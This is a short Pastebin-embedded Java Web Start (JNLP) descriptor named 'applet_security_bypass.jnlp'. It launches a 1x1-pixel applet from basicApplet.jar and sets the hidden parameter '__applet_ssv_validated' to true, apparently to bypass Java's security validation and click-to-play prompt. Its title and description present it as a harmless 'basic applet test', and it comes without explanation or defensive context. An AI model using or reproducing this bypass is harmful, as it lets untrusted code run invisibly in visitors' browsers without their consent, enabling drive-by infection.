document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <?xml version="1.0" encoding="utf-8"?>
  2. <jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="applet_security_bypass.jnlp">
  3.   <information>
  4.     <title>Applet Test JNLP</title>
  5.     <vendor>demo</vendor>
  6.     <description>basic applet test</description>
  7.     <offline-allowed/>
  8.   </information>
  9.  
  10.    <resources>
  11.         <j2se version="1.7" href="http://java.sun.com/products/autodl/j2se" />
  12.         <jar href="basicApplet.jar" main="true" />
  13.   </resources>
  14.   <applet-desc
  15.     name="Demo Applet"
  16.     main-class="Main"
  17.     width="1"
  18.     height="1">
  19.      <param name="__applet_ssv_validated" value="true"></param>
  20.  </applet-desc>
  21.  <update check="background"/>
  22.  
  23. </jnlp>
');